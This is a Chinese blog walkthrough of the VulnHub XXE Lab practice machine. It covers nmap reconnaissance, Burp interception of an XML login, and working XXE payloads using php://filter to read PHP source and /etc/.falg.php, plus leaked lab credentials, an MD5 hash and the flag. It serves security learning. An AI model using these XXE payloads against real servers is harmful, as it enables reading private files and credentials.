vulnhub xxe漏洞复现

最新推荐文章于 2024-05-06 17:36:00 发布
最新推荐文章于 2024-05-06 17:36:00 发布
阅读量249 收藏 1
点赞数 1
分类专栏: xxe漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62632029/article/details/129911415
版权

Vulnhub xxe漏洞复现

nmap扫描靶机IP

靶机ip为192.168.238.131,并且存在http服务,80端口打开

 

浏览器访问192.168.238.131

访问只存在ununtu的apache2的默认界面

访问192.168.238.131/robots.txt

(robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。 )

 

紧接着访问/xxe 

发现登录界面

 

利用burpsuites抓包

 

发现传入数据为xml语言数据传输格式

打入payload读取xxe.php。

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [
		<!ENTITY  file SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">]>
<root><name>&file;</name><password>a</password></root>

 返回数据为经过base64编码

用burpsuite自带的解码工具解码返回的xxe.php代码。

读取admin.php,查看代码用户名为administhebest密码的md5值为e6e061838856bf47e1de730719fb2609解密后为admin@123

<?php
            $msg = '';
            if (isset($_POST['login']) && !empty($_POST['username']) 
               && !empty($_POST['password'])) {
           if ($_POST['username'] == 'administhebest' && 
              md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
              $_SESSION['valid'] = true;
              $_SESSION['timeout'] = time();
              $_SESSION['username'] = 'administhebest';
              
            echo "You have entered valid use name and password <br />";
    $flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
    echo $flag;
           }else {
              $msg = 'Maybe Later';
           }
        }
     ?>
  </div> <!-- W00t/W00t -->
  
  <div class = "container">
  
     <form class = "form-signin" role = "form" 
        action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']); 
        ?>" method = "post">
        <h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
        <input type = "text" class = "form-control" 
           name = "username" 
           required autofocus></br>
        <input type = "password" class = "form-control"
           name = "password" required>
        <button class = "btn btn-lg btn-primary btn-block" type = "submit" 
           name = "login">Login</button>

访问admin.php

 

点击超链接找到新的敏感文件

 

打入payload读取flagmeout.php

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [
		<!ENTITY  file SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">]>
<root><name>&file;</name><password>a</password></root>

 

 

根据返回的内容发现为base32加密,先base32解密

 再进行base64解码 

跟上面一样 打入payload

读取/etc/.falg.php

 

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$Õ=+_;$Õ=$Õ=$Õ=$Õ=$Õ=$Õ=$Õ=$Õ=$Õ=++$Õ[];$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$Õ++;$__('$_="'.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.$___.$Õ.$Õ.$Õ.'"');$__($_);

解密后发现像php

自己写php代码运行,密码为SAFCSP{xxe_is_so_easy}

 

Ledraw
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhubxxe lab:1靶场的过关记录 渗透思路: 由于网站...
vulnhub XXE靶场
weixin_44914783的博客
09-19 1411
信息收集 (1)如图,为环境搭建好之后的状态,暂时什么都未知 (2)使用nmap工具对网段进行扫描,获取到xxe平台的IP和端口开放情况,可以判断出该平台IP为192.168.159.223 (3)进行验证,成功 (4)使用kali工具dirsearch对网站进行目录扫描,发敏感文件robots.txt (5)访问192.168.159.223/robots.txt,再次发两个敏感文件,依次访问 ...
ActiveMQ任意文件写入漏洞 CVE-2016-3088-Vulnhub漏洞
m0_55563900的博客
07-02 249
ActiveMQ任意文件写入漏洞(CVE-2016-3088) Vulnhub官方教程 https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md 背景简述 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fil
利用Vulnhub漏洞 - Electron 远程命令执行漏洞(CVE-2018-1000006)
JiangBuLiu的博客
07-03 1477
Electron 远程命令执行漏洞(CVE-2018-1000006)Vulnhub官方教程漏洞原理漏洞启动环境漏洞 Vulnhub官方教程 https://github.com/vulhub/vulhub/blob/master/electron/CVE-2018-1000006/README.zh-cn.md 漏洞原理 Electron是由Github开发,用HTML,CSS和...
利用Vulnhub漏洞 - Apache HTTPD 多后缀解析漏洞
JiangBuLiu的博客
06-27 1112
Apache HTTPD 多后缀解析漏洞Vulnhub官方教程漏洞原理漏洞启动环境漏洞如果上传一个.php文件如果上传一个.php.jpg文件通过POST请求上传文件路径因为docker-proxy端口占用80GET请求 Vulnhub官方教程 https://vulhub.org/#/environments/httpd/apache_parsing_vulnerability/...
利用Vulnhub漏洞 - ffmpeg 任意文件读取漏洞环境
JiangBuLiu的博客
07-05 1003
ffmpeg 任意文件读取漏洞环境Vulnhub官方教程漏洞原理漏洞启动环境x509: certificate has expired or is not yet valid漏洞 Vulnhub官方教程 https://vulhub.org/#/environments/ffmpeg/phdays/ 漏洞原理 FFmpeg可以处理HLS播放列表的特性,而播放列表可以引用外部文件。 ...
5、XXE漏洞pdf资料
10-15
5、XXE漏洞
刚开始学XXE漏洞,可以看看这个博客.md
05-05
刚开始学XXE漏洞的时候,很懵,看见了这个博客,就转载一下,希望对刚接触这个东西的同学有帮助,刚学的时候浪费了很多时间,希望别人可以少浪费这个找资源的时间
渗透靶场 Vulnhub:dc-3 简单
qq_47168481的博客
09-12 281
渗透靶场 DC-3
vulhub漏洞64_Solr
weixin_44193247的博客
02-12 661
vulhub漏洞练习篇
XXE漏洞靶场
weixin_63124284的博客
10-19 816
XXE也叫XML(可扩展标记语言)外部实体注入,然后我们这里拆开来解释!!! 外部实体:通过调用外部实体声明部分对XML数据进行修改、插入恶意代码。 注入:在XML数据传输过程中,数据被恶意修改,导致服务器最终执行了修改后的恶意代码。 因此XXE指的是XML数据在传输过程中,利用外部实体声明部分的“SYSTEM”关键字导致XML解析器可以从本地文件或者远程的URL中读取受保护的数据。
Apache solr xxe漏洞(CVE-2017-12629)
whojoe的博客
07-06 1889
Apache solr xxe漏洞(CVE-2017-12629)前言环境搭建漏洞参考文章 前言 影响版本 Apache Solr < 7.1 Apache Lucene < 7.1 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2017-12629-X
合规基线:让安全大检查更顺利
a38417的博客
04-29 1120
德迅基线产品还支持自定义基线功能,企业可根据实际的使用场景,自行定义基线的检查项,如定义检查阈值、自定义检查目录、自定义检查结果展模板、自定义检查项整改方案等,以满足企业多样化的内部监管要求。但是在有限的安全人员、参差不齐的安全技术水平面前,迫切需要能够辅助安全检查与自评估的自动化、标准化的基线检查工具,并且能够支持多种类型的主机、数据库、应用系统等安全基线信息的采集与检测工作。,进行实时安全核查,快速发安全配置变化,一旦发生安全配置变更异常,以邮件方式进行安全告警。相对于其他同等产品优势,
安全运维 -- splunk 操作手册
leeezp的博客
04-30 949
日常运维操作笔记 (持续更新)
深入探讨SOCKS5代理:安全、隐私与技术实
最新发布
jxyS5的博客
05-06 228
SOCKS5代理是一种网络协议,它在网络客户端和服务器之间建立一个中介,从而允许用户通过第三方服务器来发送数据包。这种代理支持TCP和UDP协议,使其不仅能处理常见的网页数据,还能处理各种程序的数据传输,如FTP、SMTP等。与早期的SOCKS协议版本相比,SOCKS5增加了对认证和IPv6的支持,这使得它在网络通讯中提供了更高的安全性和更好的兼容性。此外,SOCKS5代理不会对传输的数据进行修改,这意味着它能提供一个相对透明的方式来绕过内容限制和审查。
网络安全实训Day16
Yisitelz的博客
04-26 2102
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
WAAP动态安全解决方案
m0_66268916的博客
05-03 732
在此情况下,德迅云安全WAAP应运而生。7、协同防护:通过全站防护管理平台,对网络L3-L7层各防护模块的安全策略进行统一管理,并通过数据聚合、情报协同,形成真正的纵深防护,简化运营工作的同时进一步提升整体安全的防护水位。5、互联网暴露面资产发:通过平台和人工服务的方式,对域名、IP及关键字的综合查询及关联分析,提供互联网资产的发、识 别、监测、稽核等服务,帮助用户发和梳理互联网资产;二、全站防护,在事中阶段,从网络安全、应用安全、业务安全、API安全各层面,为Web应用提供全面安全防护闭环。
geoserver xxe漏洞
09-02
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXE(XML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修已知的漏洞,并在新版本中发布修程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值